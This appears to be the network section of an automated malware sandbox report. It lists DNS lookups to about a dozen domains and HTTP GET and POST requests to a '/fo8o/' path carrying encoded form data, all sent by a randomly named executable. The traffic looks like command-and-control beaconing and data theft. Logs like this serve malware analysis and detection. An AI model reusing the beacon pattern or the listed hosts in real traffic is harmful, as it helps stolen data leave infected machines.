                                                                                                  May 8, 2024 10:52:12.416290045 CEST4975280192.168.2.10185.237.107.49
                                                                                                  May 8, 2024 10:52:19.435422897 CEST4975280192.168.2.10185.237.107.49
                                                                                                  May 8, 2024 10:52:20.447881937 CEST4975280192.168.2.10185.237.107.49
                                                                                                  May 8, 2024 10:52:22.447535038 CEST4975280192.168.2.10185.237.107.49
                                                                                                  May 8, 2024 10:52:26.463151932 CEST4975280192.168.2.10185.237.107.49
                                                                                                  May 8, 2024 10:52:34.463176966 CEST4975280192.168.2.10185.237.107.49
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 8, 2024 10:48:59.896873951 CEST6326053192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:49:00.463779926 CEST53632601.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:49:16.169944048 CEST5752553192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:49:16.641871929 CEST53575251.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:49:30.713836908 CEST5401353192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:49:31.248903990 CEST53540131.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:49:45.825938940 CEST6479053192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:49:46.298698902 CEST53647901.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:50:00.482934952 CEST6160753192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:50:01.354851961 CEST53616071.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:50:17.105094910 CEST5322653192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:50:17.273443937 CEST53532261.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:50:32.513410091 CEST5367053192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:50:32.858745098 CEST53536701.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:50:40.926121950 CEST6009253192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:50:41.162220955 CEST53600921.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:50:55.547496080 CEST5356853192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:50:56.217941046 CEST53535681.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:51:11.717474937 CEST6057453192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:51:11.991306067 CEST53605741.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:51:26.827600956 CEST5444053192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:51:27.838325024 CEST5444053192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:51:28.112885952 CEST53544401.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:51:28.113032103 CEST53544401.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:51:43.046293020 CEST6481453192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:51:43.415055037 CEST53648141.1.1.1192.168.2.10
                                                                                                  May 8, 2024 10:51:57.061521053 CEST6296453192.168.2.101.1.1.1
                                                                                                  May 8, 2024 10:51:57.408304930 CEST53629641.1.1.1192.168.2.10
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  May 8, 2024 10:48:59.896873951 CEST192.168.2.101.1.1.10x8f11Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:49:16.169944048 CEST192.168.2.101.1.1.10xe5a3Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:49:30.713836908 CEST192.168.2.101.1.1.10x84e6Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:49:45.825938940 CEST192.168.2.101.1.1.10xf20dStandard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:00.482934952 CEST192.168.2.101.1.1.10xada4Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:17.105094910 CEST192.168.2.101.1.1.10x1e80Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:32.513410091 CEST192.168.2.101.1.1.10xad77Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:40.926121950 CEST192.168.2.101.1.1.10x78d9Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:55.547496080 CEST192.168.2.101.1.1.10x2bdfStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:11.717474937 CEST192.168.2.101.1.1.10xc2a2Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:26.827600956 CEST192.168.2.101.1.1.10xbd23Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:27.838325024 CEST192.168.2.101.1.1.10xbd23Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:43.046293020 CEST192.168.2.101.1.1.10xdea0Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:57.061521053 CEST192.168.2.101.1.1.10x93Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  May 8, 2024 10:49:00.463779926 CEST1.1.1.1192.168.2.100x8f11No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:49:16.641871929 CEST1.1.1.1192.168.2.100xe5a3No error (0)www.kasegitai.tokyo202.172.28.202A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:49:31.248903990 CEST1.1.1.1192.168.2.100x84e6No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:49:46.298698902 CEST1.1.1.1192.168.2.100xf20dNo error (0)www.antonio-vivaldi.mobi46.30.213.191A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:01.354851961 CEST1.1.1.1192.168.2.100xada4No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:01.354851961 CEST1.1.1.1192.168.2.100xada4No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:01.354851961 CEST1.1.1.1192.168.2.100xada4No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:17.273443937 CEST1.1.1.1192.168.2.100x1e80No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:32.858745098 CEST1.1.1.1192.168.2.100xad77Server failure (2)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:41.162220955 CEST1.1.1.1192.168.2.100x78d9No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:56.217941046 CEST1.1.1.1192.168.2.100x2bdfNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                                  May 8, 2024 10:50:56.217941046 CEST1.1.1.1192.168.2.100x2bdfNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:11.991306067 CEST1.1.1.1192.168.2.100xc2a2No error (0)www.donnavariedades.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:11.991306067 CEST1.1.1.1192.168.2.100xc2a2No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:28.112885952 CEST1.1.1.1192.168.2.100xbd23No error (0)www.660danm.top34.111.148.214A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:28.112885952 CEST1.1.1.1192.168.2.100xbd23No error (0)www.660danm.top34.120.249.181A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:28.113032103 CEST1.1.1.1192.168.2.100xbd23No error (0)www.660danm.top34.111.148.214A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:28.113032103 CEST1.1.1.1192.168.2.100xbd23No error (0)www.660danm.top34.120.249.181A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:43.415055037 CEST1.1.1.1192.168.2.100xdea0No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:43.415055037 CEST1.1.1.1192.168.2.100xdea0No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                                  May 8, 2024 10:51:57.408304930 CEST1.1.1.1192.168.2.100x93No error (0)www.joyesi.xyz185.237.107.49A (IP address)IN (0x0001)false
                                                                                                  • www.3xfootball.com
                                                                                                  • www.kasegitai.tokyo
                                                                                                  • www.goldenjade-travel.com
                                                                                                  • www.antonio-vivaldi.mobi
                                                                                                  • www.magmadokum.com
                                                                                                  • www.rssnewscast.com
                                                                                                  • www.techchains.info
                                                                                                  • www.elettrosistemista.zip
                                                                                                  • www.donnavariedades.com
                                                                                                  • www.660danm.top
                                                                                                  • www.empowermedeco.com
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.1049710154.215.72.110801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:00.795924902 CEST500OUTGET /fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q== HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.3xfootball.com
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:49:01.118989944 CEST691INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Wed, 08 May 2024 08:49:00 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 548
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                  May 8, 2024 10:49:01.329037905 CEST691INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Wed, 08 May 2024 08:49:00 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 548
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.1049711202.172.28.202801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:16.936454058 CEST770OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.kasegitai.tokyo
                                                                                                  Origin: http://www.kasegitai.tokyo
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.kasegitai.tokyo/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 45 72 63 2b 68 39 51 77 70 59 45 4b 41 6b 77 46 52 65 6f 66 48 4b 34 78 55 42 50
                                                                                                  Data Ascii: FBEd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffErc+h9QwpYEKAkwFReofHK4xUBP
                                                                                                  May 8, 2024 10:49:17.237772942 CEST360INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:49:17 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 196
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.1049712202.172.28.202801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:19.758498907 CEST794OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.kasegitai.tokyo
                                                                                                  Origin: http://www.kasegitai.tokyo
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.kasegitai.tokyo/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 57 32 2f 53 30 6c 64 4c 4e 6e 4c 50 6f 6a 4b 78 4a 64 6f 35 42 6a 75 43 36 53 57 51 3d 3d
                                                                                                  Data Ascii: FBEd=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwW2/S0ldLNnLPojKxJdo5BjuC6SWQ==
                                                                                                  May 8, 2024 10:49:20.048599958 CEST360INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:49:19 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 196
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.1049713202.172.28.202801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:22.568752050 CEST1807OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.kasegitai.tokyo
                                                                                                  Origin: http://www.kasegitai.tokyo
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.kasegitai.tokyo/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 49 2f 41 58 64 75 46 44 7a 61 66 57 4f 43 32 45 6b 53 4e 50 56 77 48 2b 49 67 4b 6a 31 7a 72 62 6f 53 6f 7a 2f 6e 48 76 45 70 42 37 64 62 43 57 4e 35 33 62 36 78 63 2f 71 49 46 6a 49 4d 77 72 79 48 7a 4c 57 51 75 78 6f 61 55 55 4a 6f 6d 4f 45 51 35 34 79 4b 39 63 42 55 6e 31 47 63 4e 34 31 46 70 2f 44 4d 73 43 38 44 4e 6c 7a 54 74 71 6c 33 59 58 64 66 4f 77 64 36 73 52 61 73 61 62 4b 43 68 56 70 64 4e 75 45 7a 66 59 53 7a 74 41 47 48 49 6d 65 76 6a 77 69 71 35 39 51 79 4e 64 36 32 62 [TRUNCATED]
                                                                                                  Data Ascii: FBEd=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLI/AXduFDzafWOC2EkSNPVwH+IgKj1zrboSoz/nHvEpB7dbCWN53b6xc/qIFjIMwryHzLWQuxoaUUJomOEQ54yK9cBUn1GcN41Fp/DMsC8DNlzTtql3YXdfOwd6sRasabKChVpdNuEzfYSztAGHImevjwiq59QyNd62bitKpXw4Rg4jW10WzlGrck9QbkLhOrwwFuohgJWuuRqDV8voiIwA29At+yaUGM6yP6vu/0a+4CZFOk16nUBy6YWlF/zFH3m5bdljKTP3Am0hbXjzMECCq9YLRVVKtl1oU8j6UHNpmM4oz9Er01s4uaeUjzjRDxFw85vE3iaQJrjatXklUHdiEKhtthg9VTp88fpW0kKscfFvW35O8HmB7toFa3dvfFKWpr/WNhM6R06+4nfNbSayy0M7K2sXWbTo5hns9Rnpwf83Nb9jt05v2FwenVWKgXfBgwT7K8hS65umni+YbA/CEaSXYVZHnSyXq9tcZISDAQSedsHsW/8SJdKh9IbNBWiv8TdC4zXOuIvpUdIRvGuGR+PAh7dqGHllXkfVnFBeEYUzRUEFOWAuH3xfaUErTr3kiSaNfYqeT1MyAiBokxvVlRga1pzAwB3K2gHPua4B8PcOPK6gJuseIFhJTHLx1N9YNBh5A1Zc0aEmgqwOOXFX8bZrpfQt9h0j1I/2weWFYgm0UafX55oP+Sx92CiHzeUnwNhNoDPvePwOYCGO+Uf7GhVdXfn169bENdRJ7jPyTR0Pem2GoItNmD4BBYT4xfjRR6NJcfs4V9M99M4eVszE6k1gQm4Go+IAy53Zhz7d0VXxF2vaHMz8ABQtv6NbCIMHcB0 [TRUNCATED]
                                                                                                  May 8, 2024 10:49:22.859085083 CEST360INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:49:22 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 196
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
